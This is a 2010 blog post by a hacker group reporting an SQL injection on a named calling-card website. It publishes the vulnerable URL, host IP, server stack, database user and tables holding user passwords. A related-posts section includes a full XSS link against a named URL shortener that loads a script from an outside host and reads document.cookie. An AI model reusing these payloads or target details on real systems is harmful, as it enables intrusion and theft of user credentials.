Security Alert to BamarTalk.com (Web Vulnerability)

Home / Hacking, News, Security / Security Alert to BamarTalk.com (Web Vulnerability)

February 24, 2010 PlanetCreator 0 Comments 0 tags

Hi, BamarTalk.comâ€™s Webmaster

This is PlanetCreatorâ€™s Security Te@am & Hackers Group, PlanetCreator has reported Critical SQL Injection vulnerability on Bamar Talk International Calling Cards – Cheap Call to Myanmarâ€™s Website.

Informed to : ‘[email protected]’; ‘[email protected]’; ‘[email protected]’; ‘[email protected]’; ‘[email protected]’

Sent Wed 2/24/2010 7:12 AM
Some of your Webâ€™s Data Information are as follow,

Applications: â€”â€”â€”â€”PlanetCreatorâ€™s_Universal_Advanced_Internet_Security_T00L
System Time: â€”â€”â€”â€” (UTC+08:00) Kuala Lumpur, Singapore, 2/24/2010 5:56:19 AM
Target: Â Â Â Â Â Â http://www.bamartalk.com/information.php?info_id=1
Host IP:Â Â Â Â Â Â 67.18.18.10
Web Server: Â Â Â Microsoft-IIS/6.0
Powered-by: Â Â Â ASP.NET – PHP/5.2.6
Current User: Â Â Â root@localhost
Current DB: Â Â Â voipswitch
System User: Â Â Â root@localhost
DB User & Pass: Â Â Â root:*Hidden Pass for Security Reason:localhost

Table Name â€”â€”â€”â€” Columns
usersÂ Â Â Â Â â€”â€”â€”â€” city, phone, login, email, password
settingsÂ Â â€”â€”â€”â€” id, name

We hope that your security staff will look into this issue and fix it as soon as possible.

Explore More

critical XSS Vulnerability on Ygncos Shorten Url

PlanetCreator has reported another critical XSS Vulnerability on Ygncos Shorten Url : http://www.ygn.me This vulnerability has been informed to :- webmaster Test Link http://shorten.ygn.me/index.php?url=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E Cross-site scripting (XSS) is a type

Project: The Wifi Predator

Picture this: You find yourself sitting in a hotel room that does not offer wireless internet… As you look out the window, you spot that the three hotels & a

How to hack a website? â€“ Tips and tricks

Here are the most common techniques used to hack a website Hacking sites that are least protected by password â€“ By pass authentication Itâ€™s the webmasterâ€™s nightmare, hackers accessing the

[webapps] Flowise 3.0.4 - Remote Code Execution (RCE)
on October 31, 2025 at 12:00 am
Flowise 3.0.4 - Remote Code Execution (RCE)
[webapps] Casdoor 2.95.0 - Cross-Site Request Forgery (CSRF)
on October 29, 2025 at 12:00 am
Casdoor 2.95.0 - Cross-Site Request Forgery (CSRF)
[local] Mbed TLS 3.6.4 - Use-After-Free
on September 16, 2025 at 12:00 am
Mbed TLS 3.6.4 - Use-After-Free
[webapps] Concrete CMS 9.4.3 - Stored XSS
on September 16, 2025 at 12:00 am
Concrete CMS 9.4.3 - Stored XSS
[webapps] XWiki Platform 15.10.10 - Metasploit Module for Remote Code Execution (RCE)
on September 16, 2025 at 12:00 am
XWiki Platform 15.10.10 - Metasploit Module for Remote Code Execution (RCE)